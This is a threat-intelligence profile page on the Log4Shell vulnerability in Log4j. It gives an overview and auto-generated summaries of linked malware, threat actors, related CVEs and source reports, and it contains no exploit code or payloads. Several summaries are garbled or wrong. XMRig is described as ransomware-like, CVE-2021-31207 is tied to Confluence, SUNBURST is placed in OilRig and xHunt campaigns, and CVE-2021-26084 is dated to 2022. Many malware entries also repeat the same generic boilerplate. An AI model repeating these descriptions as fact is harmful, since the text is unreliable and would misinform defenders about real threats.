Log4Shell

Vulnerability Profile Updated 7 days ago
Download STIX
Preview STIX
Log4Shell is a software vulnerability, specifically a flaw in the design or implementation of the popular Java logging library, Log4j. Identified as CVE-2021-44228, this vulnerability allows an attacker to remotely execute arbitrary code, often leading to full system compromise. Advanced Persistent Threat (APT) actors, including LockBit affiliates and GOLD MELODY (also known as UNC961), have been observed exploiting this vulnerability, among others, to gain initial access to victims' systems. These attacks targeted various internet-facing systems, such as Microsoft Exchange, Fortinet, and VMware Horizon servers. On December 15, 2021, StealthLoader malware was reported to be leveraging the Log4Shell vulnerability. This attack was noted for its distinctiveness from typical Log4Shell attacks, requiring approximately 10,000 attempts on average to succeed, thereby creating a considerable amount of network noise. Despite this, it was among the cybercriminal groups that capitalized on the Log4Shell vulnerability, demonstrating its widespread exploitation potential. In response to these threats, various organizations have provided support and information sharing to mitigate the fallout from the Log4Shell vulnerability. The Joint Cyber Defense Collaborative (JCDC) offered assistance during this period, according to the federal Cyber Safety Review Board. Additional resources on mitigating Log4Shell and other Log4j-related vulnerabilities were also made available by the Cybersecurity & Infrastructure Security Agency (CISA). Meanwhile, allegations emerged that Orca had copied Wiz's infographics and marketing content on topics such as the Log4Shell vulnerability.
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
CVE-2021-44228
11
CVE-2021-44228, also known as the Log4j vulnerability, is a software flaw found in Apache Log4j, a widely used logging utility. Despite multiple attempts by Advanced Persistent Threat (APT) actors to exploit this vulnerability in the ServiceDesk system, these efforts were unsuccessful. However, it b
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Exploit
Log4j
Vulnerability
Apache
exploitation
Exploits
Malware
Ransomware
Remote Code ...
flaw
exploited
Confluence
Lateral Move...
Apt
Operation Bl...
Manageengine
Botnet
RCE (Remote ...
Cisco
Apache Struts
bugs
Reconnaissance
Zero Day
Source
Ofbiz
Secureworks
Phishing
Chrome
Linux
Implant
Payload
Moveit
Iran
Activemq
Vcenter
WinRAR
T1190
Fortios
Redis
Zimbra
Mobileiron C...
Telegram
Esxi
Android
Minecraft
Fortiproxy
Java
Xz
Sonicwall
Korean
CISA
Microsoft
Google
Tenable
Sophos
Talos
ngrok
SBOMs
State Sponso...
Cybercrime
Backdoor
Government
Financial
T1133
M1050
Vpn
Proxy
Vrealize
Qualys
Windows
Firmware
Traversal
Vmware
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
EarlyratUnspecified
2
EarlyRat is a previously undocumented malware discovered by Kaspersky researchers in June. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The malware was first noticed in one of the Log4j cases,
KinsingUnspecified
2
Kinsing is a type of malware, short for malicious software, that is designed to exploit and damage computer systems or devices. It typically infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt o
DridexUnspecified
1
Dridex is a well-known malware, specifically a banking Trojan, that has been utilized by cybercriminals to exploit and damage computer systems. The malware infiltrates systems through dubious downloads, emails, or websites, often unbeknownst to the user, and can steal personal information, disrupt o
SUNBURSTUnspecified
1
Sunburst is a sophisticated malware that has been linked to the Kazuar code, indicating its complexity. It was used in several well-known cyber attack campaigns such as SUNBURST, OilRig, xHunt, DarkHydrus, and Decoy Dog, which employed DNS tunneling techniques for command and control (C2) communicat
AvosLockerUnspecified
1
AvosLocker is a type of malware, specifically a ransomware, that has been causing significant issues across the digital landscape. Ransomware is a form of malicious software designed to exploit and damage computer systems, often infiltrating through suspicious downloads, emails, or websites without
NineratUnspecified
1
NineRAT is a malware strain developed by the Lazarus group, and it was first used in Operation Blacksmith in March 2022 against a South American agricultural organization. The malware was initially built around May 2022 and was later observed being utilized in September against a European manufactur
XmrigUnspecified
1
XMRig is a type of malware that is particularly harmful to computer systems and devices. It infiltrates the system through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt operations, or even hold your data hostage for
ContiUnspecified
1
Conti is a type of malware, specifically ransomware, known for its ability to disrupt operations, steal personal information, and hold data hostage for ransom. The malicious software infiltrates systems via suspicious downloads, emails, or websites, often unbeknownst to the user. It has been used in
LockbitUnspecified
1
LockBit is a type of malware, specifically ransomware, that infiltrates systems to exploit and damage them. It can enter your system through various channels such as suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt
PowerstarUnspecified
1
Powerstar is a malicious software (malware) deployed by the Iranian Advanced Persistent Threat (APT) group known as Charming Kitten, also referred to as APT35, Mint Sandstorm, Cobalt Illusion, and Yellow Garuda. This malware was used in a series of spear-phishing attacks launched by the group since
ClopUnspecified
1
Clop is a notorious malware, short for malicious software, known for its disruptive and damaging effects on computer systems. It primarily infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, Clop can steal personal information, disrupt o
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
Lazarus GroupUnspecified
4
The Lazarus Group, a notorious threat actor believed to be linked to North Korea, has been attributed with a series of significant cyber-attacks over the past few years. The group's malicious activities include the exploitation of digital infrastructure, stealing cryptocurrency, and executing large-
AndarielUnspecified
3
Andariel, a notorious threat actor associated with the Lazarus Group and linked to North Korea, is known for its malicious cyber activities. The group has been identified using DTrack malware and Maui ransomware, notably in mid-2022, and has developed a reputation for exploiting ActiveX objects. Res
APT41Unspecified
1
APT41, also known as Winnti, Wicked Panda, and Wicked Spider, is a sophisticated threat actor attributed to China. This group has been active since at least 2012, targeting organizations across 14 countries. The group is known for its extensive use of various code families and tools, with at least 4
Mint SandstormUnspecified
1
Mint Sandstorm, an Iranian nation-state threat actor also known as APT35 and Charming Kitten, has been identified by Microsoft as a significant cybersecurity concern. The group is linked to Iran's Islamic Revolutionary Guard Corps and is known for its sophisticated cyber campaigns targeting high-val
MERCURYUnspecified
1
Mercury, also known as MuddyWater and Static Kitten, is a threat actor group linked to global espionage activities, with suspected ties to the Iranian Ministry of Intelligence and Security. This group has been noted for its malicious activities, compromising multiple victims that another group, POLO
StoneflyUnspecified
1
Stonefly, also known as Andariel or Silent Chollima, is a threat actor group believed to be linked with the North Korean government. Active since at least 2015, Stonefly has been involved in numerous attacks, including several attributed to the North Korean state-sponsored operation Lazarus. The gro
Magicline4nxUnspecified
1
Magicline4nx is a threat actor that has recently emerged as a significant cybersecurity concern. This entity, which could be an individual, a private company, or a part of a government organization, is responsible for executing actions with malicious intent. In the realm of cybersecurity, where nami
LapsusUnspecified
1
Lapsus is a significant threat actor that has been active since its inception in early 2022. The group gained notoriety for its cyberattacks, including a high-profile breach of Nvidia, an American multinational technology company, in the same year. This attack led to the leak of thousands of passwor
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
ProxyshellUnspecified
5
ProxyShell is a critical vulnerability affecting Microsoft Exchange email servers. Identified as CVE-2021-34473, it is a flaw in software design or implementation that can be exploited by attackers to gain unauthorized access to systems. The vulnerability was actively exploited by threat actors, cau
FollinaUnspecified
3
Follina, also known as CVE-2022-30190, is a notable software vulnerability that was discovered and exploited in the first half of 2022. This flaw, found in the Microsoft Windows Support Diagnostic Tool (MSDT), was weaponized by TA413, a cyber threat actor group with suspected ties to China. The grou
CVE-2022-30190Unspecified
3
CVE-2022-30190, also known as the "Follina" vulnerability, is a high-risk software flaw in the Microsoft Support Diagnostic Tool that allows for remote code execution. This 0-day vulnerability was disclosed in May 2022 and has since been exploited by threat actors, including TA413, who weaponized it
CVE-2021-34523Unspecified
2
None
CVE-2017-5638Unspecified
2
CVE-2017-5638 is a significant vulnerability found in Apache Struts, a widely used open-source framework for developing Java web applications. This flaw in software design or implementation allowed attackers to remotely execute commands on the server running the vulnerable application, leading to po
CVE-2021-26084Unspecified
2
CVE-2021-26084 is a critical vulnerability related to Atlassian's Confluence software. The flaw in the software design or implementation was first exploited as a zero-day, before its public disclosure in June 2022. It allowed remote attackers to execute code on a Confluence Server via injection atta
CVE-2022-22954Unspecified
2
CVE-2022-22954 is a significant software vulnerability that affects VMware's Workspace One Access and Identity Manager. This flaw in the software design or implementation allows for remote code execution, providing an attacker with the ability to execute arbitrary commands on the affected system. Ov
CVE-2022-1388Unspecified
2
CVE-2022-1388 is a critical vulnerability identified in the F5 BIG-IP iControl REST interface, which allows for an authentication bypass. This flaw in software design or implementation enables unauthorized users to gain access and control over the system without needing to authenticate their identit
CVE-2022-26134Unspecified
2
CVE-2022-26134 is a critical software vulnerability that was discovered in Atlassian Confluence Server and Data Center. This flaw, which allows for remote code execution (RCE), was publicly disclosed by Atlassian in June 2022. The Cybersecurity and Infrastructure Security Agency (CISA) recognized th
CVE-2021-45046is / was
2
None
CVE-2021-34473Unspecified
2
CVE-2021-34473 is a significant software vulnerability that was discovered in Microsoft Exchange Server. This flaw, along with two others (CVE-2021-31207 and CVE-2021-34523), forms a chain of vulnerabilities known as ProxyShell. These vulnerabilities can be exploited together by remote attackers to
CVE-2018-13379Unspecified
2
CVE-2018-13379 is a critical vulnerability that affects FortiOS and Fortiguard, presenting a flaw in their software design or implementation. This specific vulnerability, which can expose sensitive credentials, has been frequently exploited, making the top 15 most routinely exploited list in both 20
CVE-2021-31207Unspecified
2
CVE-2021-31207 is a significant software vulnerability that affects Atlassian Confluence and Microsoft Exchange. It was discovered that Advanced Persistent Threat group APT40 rapidly exploits this flaw, along with other public vulnerabilities in widely used software like Log4J (CVE-2021-44228) and M
CVE-2021-40539Unspecified
2
None
CVE-2022-22960Unspecified
2
None
CVE-2012-1823Unspecified
1
None
CVE-2017-12617Unspecified
1
None
ProxynotshellUnspecified
1
ProxyNotShell is a software vulnerability, specifically a flaw in the design or implementation of Microsoft Exchange Server. It was first identified and exploited through CVE-2022-41082, as reported by Palo Alto Networks' Unit 42. The ProxyNotShell exploit method leveraged an AutoDiscover endpoint t
CVE-2021-44832Unspecified
1
None
Citrix BleedUnspecified
1
Citrix Bleed, identified as CVE-2023-4966, is a severe software vulnerability in Citrix Netscaler Gateway and Netscaler ADC products, with a high CVSS score of 9.4 indicating its critical nature. This flaw allows for sensitive information disclosure, bypassing password requirements and multifactor a
CVE-2023-38831Unspecified
1
CVE-2023-38831 is a critical vulnerability identified in the WinRAR software, with a CVSS score of 7.8, indicating high severity. This flaw in software design or implementation has been exploited to disseminate the LONEPAGE malware through ZIP files using an exploit known as UAC-0099. The vulnerabil
CVE-2022-47966Unspecified
1
CVE-2022-47966 is a critical vulnerability discovered in Zoho ManageEngine ServiceDesk Plus, a widely used IT management software. The flaw was exploited by malicious actors to gain unauthorized access to the organization's systems and networks. The exploitation started just five days after proof-of
CVE-2021-4428Unspecified
1
None
CVE-2021-20038Unspecified
1
None
CVE-2022-24990Unspecified
1
None
CVE-2021-45105is / was
1
None
meltdownis related to
1
Meltdown is a significant software vulnerability that was discovered in 2018, alongside another threat known as Spectre. These vulnerabilities affected virtually every modern microprocessor and sparked widespread concern due to their potential to expose confidential user data to hackers. Both Meltdo
SpectreUnspecified
1
Spectre, also known as Spectre-BHB or branch history injection (BHI), is a software vulnerability that allows unauthorized access to sensitive data stored in the cache memory of computer systems. Discovered in 2018, it was initially dismissed by some in the semiconductor industry due to its potentia
Proxyshell Cve-2021-34473Unspecified
1
ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) is a set of three chained vulnerabilities that perform unauthenticated remote code execution (RCE) in Microsoft Exchange. Identified as a significant flaw in software design or implementation, it allows unauthorized users to execute arbitra
CVE-2021-42237Unspecified
1
CVE-2021-42237 is a software vulnerability discovered in Sitecore XP, a popular content management system. This flaw was one of several exploited by the cybercriminal group known as Gold Melody between July 2020 and July 2022. The group targeted internet-exposed servers, using these vulnerabilities
ProxylogonUnspecified
1
ProxyLogon is a notable software vulnerability that surfaced in the cybersecurity landscape. It was part of an exploit chain, including CVE-2021-26855, a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server. This flaw allowed attackers to bypass authentication mechanisms and
CVE-2021-26855Unspecified
1
CVE-2021-26855 is a significant software vulnerability, specifically a zero-day server-side request forgery (SSRF) flaw, found in Microsoft Exchange 2013, 2016, and 2019. This vulnerability was exploited by attackers to gain initial access to email servers and drop an ASPX webshell, leveraging the t
Proxylogon (Cve-2021-26855Unspecified
1
None
Proxylogon Cve-2021-26855Unspecified
1
None
CVE-2019-11043Unspecified
1
None
Source Document References
Information about the Log4Shell Vulnerability was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
Checkpoint
15 hours ago
22nd July – Threat Intelligence Report - Check Point Research
Checkpoint
7 days ago
15th July – Threat Intelligence Report - Check Point Research
Checkpoint
15 days ago
8th July – Threat Intelligence Report - Check Point Research
DARKReading
21 days ago
'RegreSSHion' Bug Threatens Takeover of Millions of Linux Systems
Checkpoint
22 days ago
1st July – Threat Intelligence Report - Check Point Research
Checkpoint
a month ago
24th June – Threat Intelligence Report - Check Point Research
Checkpoint
a month ago
17th June – Threat Intelligence Report - Check Point Research
BankInfoSecurity
a month ago
Ransomware Gang TellYouThePass Exploits PHP Vulnerability
Checkpoint
a month ago
10th June – Threat Intelligence Report - Check Point Research
BankInfoSecurity
a month ago
CISA Planning JCDC Overhaul as Experts Criticize Slow Start
BankInfoSecurity
2 months ago
Wiz Counters Orca Security's Patent Infringement Allegations
RIA - Information System Authority
2 months ago
Trends and Challenges in Cyber Security – Q4 2021
RIA - Information System Authority
2 months ago
Threat Assessment: Cyber attacks against Ukraine and possible impact in Estonia
Checkpoint
2 months ago
3rd June – Threat Intelligence Report - Check Point Research
Checkpoint
2 months ago
27th May – Threat Intelligence Report - Check Point Research
Checkpoint
2 months ago
20th May – Threat Intelligence Report - Check Point Research
Checkpoint
2 months ago
13th May – Threat Intelligence Report - Check Point Research
Checkpoint
3 months ago
6th May – Threat Intelligence Report - Check Point Research
Checkpoint
3 months ago
29th April – Threat Intelligence Report - Check Point Research
Checkpoint
3 months ago
15th April – Threat Intelligence Report - Check Point Research